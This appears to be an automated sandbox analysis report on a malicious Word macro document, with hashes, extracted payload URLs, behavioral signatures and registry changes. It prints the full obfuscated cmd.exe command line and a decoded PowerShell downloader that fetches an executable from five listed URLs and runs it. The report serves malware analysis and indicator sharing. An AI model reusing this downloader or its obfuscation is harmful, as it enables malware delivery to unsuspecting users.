Analysis
-
max time kernel
139s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25-11-2022 09:49
Behavioral task
behavioral1
Sample
603f6b609a396a112d5a90a916b640495b26049afbfdc295bee92d5a31f4376c.doc
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
603f6b609a396a112d5a90a916b640495b26049afbfdc295bee92d5a31f4376c.doc
Resource
win10v2004-20220812-en
General
-
Target
603f6b609a396a112d5a90a916b640495b26049afbfdc295bee92d5a31f4376c.doc
-
Size
145KB
-
MD5
2d09a7533f009b0f6cd0b9f237041761
-
SHA1
d4438568059da8dac7c76871f575867776674a96
-
SHA256
603f6b609a396a112d5a90a916b640495b26049afbfdc295bee92d5a31f4376c
-
SHA512
bd6322e3baeb29ee7a86ce281f02659cc97cb188cdd70e2927c2260b74f8398b4d7e17caf5e99b2fcd3a333be89fc4de2ae50ff4186ee5a21f8cbd4b495ae767
-
SSDEEP
1536:N81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a96nDfPsPwSvURabL:N8GhDS0o9zTGOZD6EbzCdgDfPsIaH
Malware Config
Extracted
http://aspiringfilms.com/lJc7Qpx
http://kelvinnikkel.com/HgR
http://dayofdisconnect.com/O5Le4
http://joynt.net/PVP9Pn
http://craftww.pl//I1Db12jC
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 560 1672 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 5 324 powershell.exe 7 324 powershell.exe 8 324 powershell.exe 11 324 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 560 cmd.exe 880 cmd.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1672 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 324 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1672 WINWORD.EXE 1672 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WINWORD.EXEcmd.execmd.exedescription pid process target process PID 1672 wrote to memory of 760 1672 WINWORD.EXE splwow64.exe PID 1672 wrote to memory of 760 1672 WINWORD.EXE splwow64.exe PID 1672 wrote to memory of 760 1672 WINWORD.EXE splwow64.exe PID 1672 wrote to memory of 760 1672 WINWORD.EXE splwow64.exe PID 1672 wrote to memory of 560 1672 WINWORD.EXE cmd.exe PID 1672 wrote to memory of 560 1672 WINWORD.EXE cmd.exe PID 1672 wrote to memory of 560 1672 WINWORD.EXE cmd.exe PID 1672 wrote to memory of 560 1672 WINWORD.EXE cmd.exe PID 560 wrote to memory of 880 560 cmd.exe cmd.exe PID 560 wrote to memory of 880 560 cmd.exe cmd.exe PID 560 wrote to memory of 880 560 cmd.exe cmd.exe PID 560 wrote to memory of 880 560 cmd.exe cmd.exe PID 880 wrote to memory of 324 880 cmd.exe powershell.exe PID 880 wrote to memory of 324 880 cmd.exe powershell.exe PID 880 wrote to memory of 324 880 cmd.exe powershell.exe PID 880 wrote to memory of 324 880 cmd.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\603f6b609a396a112d5a90a916b640495b26049afbfdc295bee92d5a31f4376c.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
\??\c:\windows\SysWOW64\cmd.exec:\tUncDEpsQNmuGG\ristSbTd\vlnUPFqZAphRN\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set 9HMF=qPwfvuhPEpGpIRJRO0)W4B-YH$gN2/yanc{}13.Lb',D7T +sdkQiUjx@(\C:=;r8FzmlMeVt9oS5A&&for %u in (25,74,27,6,61,41,50,15,71,41,62,25,0,66,52,61,32,70,2,22,74,40,54,70,33,72,46,27,70,72,38,19,70,40,59,68,52,70,32,72,62,25,45,4,71,61,41,6,72,72,11,60,29,29,31,48,11,52,63,52,32,26,3,52,68,67,48,38,33,74,67,29,68,14,33,44,51,11,55,56,6,72,72,11,60,29,29,50,70,68,4,52,32,32,52,50,50,70,68,38,33,74,67,29,24,26,15,56,6,72,72,11,60,29,29,49,31,30,74,3,49,52,48,33,74,32,32,70,33,72,38,33,74,67,29,16,76,39,70,20,56,6,72,72,11,60,29,29,54,74,30,32,72,38,32,70,72,29,7,71,7,73,7,32,56,6,72,72,11,60,29,29,33,63,31,3,72,2,2,38,11,68,29,29,12,36,43,40,36,28,54,59,41,38,75,11,68,52,72,57,41,56,41,18,62,25,69,2,24,61,41,19,53,48,41,62,25,23,5,50,46,61,46,41,28,37,76,41,62,25,3,2,24,61,41,2,69,51,41,62,25,66,77,8,61,25,70,32,4,60,72,70,67,11,47,41,58,41,47,25,23,5,50,47,41,38,70,55,70,41,62,3,74,63,70,31,33,6,57,25,53,51,65,46,52,32,46,25,45,4,71,18,34,72,63,30,34,25,0,66,52,38,43,74,2,32,68,74,31,49,65,52,68,70,57,25,53,51,65,42,46,25,66,77,8,18,62,25,7,2,15,61,41,72,51,21,41,62,12,3,46,57,57,10,70,72,22,12,72,70,67,46,25,66,77,8,18,38,68,70,32,26,72,6,46,22,26,70,46,64,17,17,17,17,18,46,34,12,32,4,74,50,70,22,12,72,70,67,46,25,66,77,8,62,25,75,49,49,61,41,33,50,59,41,62,40,63,70,31,50,62,35,35,33,31,72,33,6,34,35,35,25,71,72,19,61,41,12,24,3,41,62,84)do set edF8=!edF8!!9HMF:~%u,1!&&if %u gtr 83 powershell.exe "!edF8:~6!""2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeCmD /V:O/C"set 9HMF=qPwfvuhPEpGpIRJRO0)W4B-YH$gN2/yanc{}13.Lb',D7T +sdkQiUjx@(\C:=;r8FzmlMeVt9oS5A&&for %u in (25,74,27,6,61,41,50,15,71,41,62,25,0,66,52,61,32,70,2,22,74,40,54,70,33,72,46,27,70,72,38,19,70,40,59,68,52,70,32,72,62,25,45,4,71,61,41,6,72,72,11,60,29,29,31,48,11,52,63,52,32,26,3,52,68,67,48,38,33,74,67,29,68,14,33,44,51,11,55,56,6,72,72,11,60,29,29,50,70,68,4,52,32,32,52,50,50,70,68,38,33,74,67,29,24,26,15,56,6,72,72,11,60,29,29,49,31,30,74,3,49,52,48,33,74,32,32,70,33,72,38,33,74,67,29,16,76,39,70,20,56,6,72,72,11,60,29,29,54,74,30,32,72,38,32,70,72,29,7,71,7,73,7,32,56,6,72,72,11,60,29,29,33,63,31,3,72,2,2,38,11,68,29,29,12,36,43,40,36,28,54,59,41,38,75,11,68,52,72,57,41,56,41,18,62,25,69,2,24,61,41,19,53,48,41,62,25,23,5,50,46,61,46,41,28,37,76,41,62,25,3,2,24,61,41,2,69,51,41,62,25,66,77,8,61,25,70,32,4,60,72,70,67,11,47,41,58,41,47,25,23,5,50,47,41,38,70,55,70,41,62,3,74,63,70,31,33,6,57,25,53,51,65,46,52,32,46,25,45,4,71,18,34,72,63,30,34,25,0,66,52,38,43,74,2,32,68,74,31,49,65,52,68,70,57,25,53,51,65,42,46,25,66,77,8,18,62,25,7,2,15,61,41,72,51,21,41,62,12,3,46,57,57,10,70,72,22,12,72,70,67,46,25,66,77,8,18,38,68,70,32,26,72,6,46,22,26,70,46,64,17,17,17,17,18,46,34,12,32,4,74,50,70,22,12,72,70,67,46,25,66,77,8,62,25,75,49,49,61,41,33,50,59,41,62,40,63,70,31,50,62,35,35,33,31,72,33,6,34,35,35,25,71,72,19,61,41,12,24,3,41,62,84)do set edF8=!edF8!!9HMF:~%u,1!&&if %u gtr 83 powershell.exe "!edF8:~6!""3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$oNh='kRV';$qzi=new-object Net.WebClient;$TvV='http://aspiringfilms.com/lJc7Qpx@http://kelvinnikkel.com/HgR@http://dayofdisconnect.com/O5Le4@http://joynt.net/PVP9Pn@http://craftww.pl//I1Db12jC'.Split('@');$MwH='WUs';$Yuk = '235';$fwH='wMQ';$zAE=$env:temp+'\'+$Yuk+'.exe';foreach($UQF in $TvV){try{$qzi.DownloadFile($UQF, $zAE);$PwR='tQB';If ((Get-Item $zAE).length -ge 80000) {Invoke-Item $zAE;$Sdd='ckC';break;}}catch{}}$VtW='IHf';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/324-64-0x0000000000000000-mapping.dmp
-
memory/324-71-0x000000006ADB0000-0x000000006B35B000-memory.dmpFilesize
5.7MB
-
memory/324-68-0x0000000004B40000-0x0000000004C54000-memory.dmpFilesize
1.1MB
-
memory/324-67-0x000000006ADB0000-0x000000006B35B000-memory.dmpFilesize
5.7MB
-
memory/324-66-0x000000006ADB0000-0x000000006B35B000-memory.dmpFilesize
5.7MB
-
memory/560-62-0x0000000000000000-mapping.dmp
-
memory/760-60-0x000007FEFBC01000-0x000007FEFBC03000-memory.dmpFilesize
8KB
-
memory/760-59-0x0000000000000000-mapping.dmp
-
memory/880-63-0x0000000000000000-mapping.dmp
-
memory/1672-61-0x000000007120D000-0x0000000071218000-memory.dmpFilesize
44KB
-
memory/1672-54-0x00000000727A1000-0x00000000727A4000-memory.dmpFilesize
12KB
-
memory/1672-58-0x0000000075BD1000-0x0000000075BD3000-memory.dmpFilesize
8KB
-
memory/1672-57-0x000000007120D000-0x0000000071218000-memory.dmpFilesize
44KB
-
memory/1672-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1672-69-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1672-70-0x000000007120D000-0x0000000071218000-memory.dmpFilesize
44KB
-
memory/1672-55-0x0000000070221000-0x0000000070223000-memory.dmpFilesize
8KB